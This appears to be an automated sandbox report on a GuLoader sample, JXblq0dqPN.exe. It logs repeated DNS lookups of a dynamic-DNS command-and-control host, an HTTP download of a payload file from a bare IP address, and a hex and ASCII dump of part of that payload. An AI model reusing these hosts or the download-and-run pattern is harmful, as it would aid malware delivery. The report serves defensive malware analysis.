              Aug 3, 2021 18:05:08.625143051 CEST8.8.8.8192.168.2.70xd1f4No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:05:11.801686049 CEST8.8.8.8192.168.2.70x5a16No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:05:14.028672934 CEST8.8.8.8192.168.2.70x8e29No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:05:16.217849970 CEST8.8.8.8192.168.2.70x3c60No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:05:18.415306091 CEST8.8.8.8192.168.2.70xedbbNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:05:20.610532999 CEST8.8.8.8192.168.2.70x9e9No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:05:22.797117949 CEST8.8.8.8192.168.2.70x378No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:05:25.036484957 CEST8.8.8.8192.168.2.70x87e4No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:05:27.255598068 CEST8.8.8.8192.168.2.70xd4aaNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:05:30.754188061 CEST8.8.8.8192.168.2.70x1d87No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:05:33.063888073 CEST8.8.8.8192.168.2.70x4a12No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:05:35.264806032 CEST8.8.8.8192.168.2.70x7c58No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:05:37.485719919 CEST8.8.8.8192.168.2.70x9baaNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:05:39.687992096 CEST8.8.8.8192.168.2.70x643fNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:05:41.925355911 CEST8.8.8.8192.168.2.70x582dNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:05:44.133326054 CEST8.8.8.8192.168.2.70x835dNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:05:46.355571032 CEST8.8.8.8192.168.2.70xb619No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:05:49.114978075 CEST8.8.8.8192.168.2.70xad66No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:05:51.315931082 CEST8.8.8.8192.168.2.70x2e1aNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:05:53.529486895 CEST8.8.8.8192.168.2.70x421bNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:05:55.736372948 CEST8.8.8.8192.168.2.70xc87No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:05:57.963054895 CEST8.8.8.8192.168.2.70xee3fNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:06:00.164889097 CEST8.8.8.8192.168.2.70xe089No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:06:02.375046968 CEST8.8.8.8192.168.2.70xc548No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:06:04.589843035 CEST8.8.8.8192.168.2.70x86c3No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:06:06.815399885 CEST8.8.8.8192.168.2.70x4a5cNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:06:09.012912989 CEST8.8.8.8192.168.2.70x9c4No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:06:11.242706060 CEST8.8.8.8192.168.2.70x33baNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:06:13.507868052 CEST8.8.8.8192.168.2.70x571eNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:06:15.697130919 CEST8.8.8.8192.168.2.70x6b30No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:06:17.896765947 CEST8.8.8.8192.168.2.70x4ea5No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:06:20.259336948 CEST8.8.8.8192.168.2.70x1cc7No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:06:22.522475958 CEST8.8.8.8192.168.2.70xb059No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:06:24.743968964 CEST8.8.8.8192.168.2.70x437fNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:06:26.943700075 CEST8.8.8.8192.168.2.70x4247No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:06:29.156662941 CEST8.8.8.8192.168.2.70x5512No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:06:31.352756023 CEST8.8.8.8192.168.2.70xd5e3No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:06:33.561729908 CEST8.8.8.8192.168.2.70xf54dNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:06:35.760827065 CEST8.8.8.8192.168.2.70x75c3No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:06:37.989125013 CEST8.8.8.8192.168.2.70xc0a5No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:06:41.071511984 CEST8.8.8.8192.168.2.70x7b64No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:06:43.277365923 CEST8.8.8.8192.168.2.70x1dNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:06:45.470468044 CEST8.8.8.8192.168.2.70xfd8No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:06:47.667928934 CEST8.8.8.8192.168.2.70xb137No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:06:49.857407093 CEST8.8.8.8192.168.2.70x7a24No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)

              HTTP Request Dependency Graph

              • 101.99.94.119

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.749745101.99.94.11980C:\Users\user\Desktop\JXblq0dqPN.exe
              TimestampkBytes transferredDirectionData
              Aug 3, 2021 18:00:39.972902060 CEST11253OUTGET /WEALTH_fkWglQyCXO188.bin HTTP/1.1
              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
              Host: 101.99.94.119
              Cache-Control: no-cache
              Aug 3, 2021 18:00:40.022622108 CEST11255INHTTP/1.1 200 OK
              Date: Tue, 03 Aug 2021 16:00:39 GMT
              Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
              Last-Modified: Mon, 02 Aug 2021 21:02:57 GMT
              ETag: "72840-5c899e4c3da73"
              Accept-Ranges: bytes
              Content-Length: 469056
              Content-Type: application/octet-stream
              Data Raw: 31 79 a2 69 b5 67 ac a3 66 68 89 94 04 1b b4 8f c9 36 a1 00 58 5a db 92 66 6d cc 77 0a bf 4e 76 be cb df 4e 9d df 64 5e 44 ed 21 f3 cf f9 7d 62 b4 1b 44 fc 1e d1 54 51 7a 33 c1 4c df e6 15 ab fc 9f 41 d1 41 8f 51 31 14 c8 d8 11 ba 23 86 c1 35 93 9d fc 44 9e 32 ca a0 fd 73 d9 cb f8 37 88 87 1a 45 0a f7 90 fa bf 49 a3 1e a6 e2 63 d3 da f7 1b 8c 3f 3b 56 fb 73 f5 5f 71 11 21 67 d6 a5 5b 6f 63 6f 44 5d 92 7d a4 66 fa 44 00 3d 71 d6 5c 03 88 d7 97 a0 3d f6 3d 55 3c 74 0e f3 18 b3 74 b0 8f 9b fc 7f 70 16 c6 64 54 6e 65 de 18 f0 d3 5c bc 13 45 22 ac 24 20 7e 82 b9 70 76 a4 7d 01 f7 d5 61 be 6f 06 f4 2c 87 a6 b3 20 b2 ad 40 2e d1 2f 53 60 03 72 48 d8 a8 33 13 0a f2 ff d2 dd 78 63 a0 8b 27 17 28 0e 60 82 f6 72 ae 94 e0 7b d9 7f 8e c3 dd 64 b8 7a 3f 9c de 07 ce e8 0f a5 e2 f6 89 60 01 25 fd 8a 32 fc 79 07 a7 ab df eb 97 4a 2c 9a 34 91 22 ae 83 f5 10 09 71 2b 83 86 cf 6e c1 fd 78 9b ff 23 b1 96 1b 1e b1 63 5b 3d 90 ef 89 7e 8a 22 4d e5 54 77 c8 44 5a ca a4 4c 7d b5 c0 fc c0 dd 2e 18 32 28 dd ca 3a 96 9c 05 f0 1c 01 92 09 ad 55 8b 34 03 76 7c 2a c7 57 01 af c3 92 f4 fe a1 46 ae cb 12 c4 67 bb f2 9c 4b c8 90 cb 0b 36 3d a2 cf d6 65 cd 91 6d 1a 7b b3 ae 5d b5 71 0a 24 46 d2 95 ab 70 f8 9c 0c 0f 55 c2 c0 0c ed 95 d2 b5 e3 48 48 bc f0 3e 3a 82 e8 91 28 22 11 91 fd 50 31 d0 48 57 96 73 6f 6f ab 25 0c 11 ac 70 08 53 83 83 3f b8 3e c5 49 ba 0a e0 6c cd 20 3a db 77 67 8e fb 36 1e cb 1f 01 03 9a 71 8e 49 ed 61 2c 69 21 ad ce f9 ee ff ec 84 8e 6d 86 db b8 3f b7 03 e2 7f 24 ba 8c 67 c8 40 b0 eb df 8a b4 91 9b 4f 28 1a 3b 00 71 28 06 b7 a3 84 fa b2 23 5c 4c 76 b9 6d c0 ea b6 ba 5f 07 9a 82 96 5b b9 53 9d 33 fd 1b e9 51 5d 11 32 aa ab 37 a4 e9 e4 ed 8f 5f a9 dd 16 e8 f1 02 6d 5d 93 67 0b b1 97 41 ba 80 65 d4 cc ba 7e b1 6e be 4b 0a b7 2c 68 50 ad 15 84 32 c1 47 3e 78 a2 f0 ac 5e f6 53 15 d2 d0 93 e0 68 65 1c ab 21 69 d6 3b e3 69 9c 2b 10 57 7b 25 d8 99 a9 23 1e 80 6a 8b d0 4c c9 98 5f 04 ad 20 6e 20 e0 d4 86 3d d5 78 c0 63 00 93 0d 76 4f fd ab d5 50 53 0c fd ae b8 f8 84 03 9c dc 98 09 3d 1f 8f 80 de 9c d3 a6 97 0b fa 1a 66 11 63 4d 31 1f 06 d7 7e 4c ea b2 0d 17 00 0e 9f e1 20 97 00 06 32 b2 d4 a3 8a ef 7a 40 7f dd 0c 11 b7 be c1 20 e1 bb 88 08 d8 e9 42 02 00 36 78 93 28 da 41 52 f9 96 9e c3 54 a2 68 b6 e1 93 f8 b8 d3 15 6d 42 73 42 64 ce 30 64 40 c6 a3 ef ed a2 d8 77 ce b3 d0 4e 87 51 cd 57 42 a7 9e 1f fa 7c 71 00 a0 0e f5 10 6a ff 84 ee f7 d2 d0 7f 20 ec 19 ab 75 73 9c 02 41 31 3d 88 d3 19 ed 16 29 30 07 c6 5c c1 5b bd a4 4b 02 bc c6 24 24 f2 cb 2e 0a a2 1f a2 53 16 ba b6 66 85 70 87 87 55 7d 12 44 66 c1 b9 46 4e 1e a0 dc 7a e0 ca 8e 6e f8 1e 4b 3f 65 f2 b4 35 8e 12 2c b3 7e 16 04 83 d2 5c fc e9 9c 64 d2 98 66 e9 42 4b 0b ac c1 11 2d 8f b1 c5 d1 d1 42 8f 51 31 10 c8 d8 11 45 dc 86 c1 8d 93 9d fc 44 9e 32 ca e0 fd 73 d9 cb f8 37 88 87 1a 45 0a f7 90 fa bf 49 a3 1e a6 e2 63 d3 da f7 1b 8c 3f 3b 56 fb 73 f5 5f 71 11 31 66 d6 a5 55 70 d9 61 44 e9 9b b0 85 de fb 08 cd 1c 25 be 35 70 a8 a7 e5 cf 5a 84 5c 38 1c 17 6f 9d 76 dc 00 90 ed fe dc 0d 05 78 e6 0d 3a 4e 21 91 4b d0 be 33 d8 76 6b 2f a1 2e 04 7e 82 b9 70 76 a4 7d ab 74 97 51 50 8d 2a 97 c2 65 8a
              Data Ascii: 1yigfh6XZfmwNvNd^D!}bDTQz3LAAQ1#5D2s7EIc?;Vs_q!g[ocoD]}fD=q\==U<ttpdTne\E"$ ~pv}ao, @./S`rH3xc'(`r{dz?`%2yJ,4"q+nx#c[=~"MTwDZL}.2(:U4v|*WFgK6=em{]q$FpUHH>:("P1HWsoo%pS?>Il :wg6qIa,i!m?$g@O(;q(#\Lvm_[S3Q]27_m]gAe~nK,hP2G>x^She!i;i+W{%#jL_ n =xcvOPS=fcM1~L 2z@ B6x(ARThmBsBd0d@wNQWB|qj usA1=)0\[K$$.SfpU}DfFNznK?e5,~\dfBK-BQ1ED2s7EIc?;Vs_q1fUpaD%5pZ\8ovx:N!K3vk/.~pv}tQP*e


              Code Manipulations

              Statistics

              Behavior

              Click to jump to process

              System Behavior

              General

              Start time:17:58:19
              Start date:03/08/2021
              Path:C:\Users\user\Desktop\JXblq0dqPN.exe
              Wow64 process (32bit):true
              Commandline:'C:\Users\user\Desktop\JXblq0dqPN.exe'
              Imagebase:0x400000
              File size:114688 bytes
              MD5 hash:8718D75B7CAC53F13D01DDEA9B52CEE0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:Visual Basic
              Yara matches:
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.387951770.0000000002260000.00000040.00000001.sdmp, Author: Joe Security
              Reputation:low

              General

              Start time:17:59:33
              Start date:03/08/2021
              Path:C:\Users\user\Desktop\JXblq0dqPN.exe
              Wow64 process (32bit):true
              Commandline:'C:\Users\user\Desktop\JXblq0dqPN.exe'
              Imagebase:0x400000
              File size:114688 bytes
              MD5 hash:8718D75B7CAC53F13D01DDEA9B52CEE0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              Disassembly

              Code Analysis

              Reset < >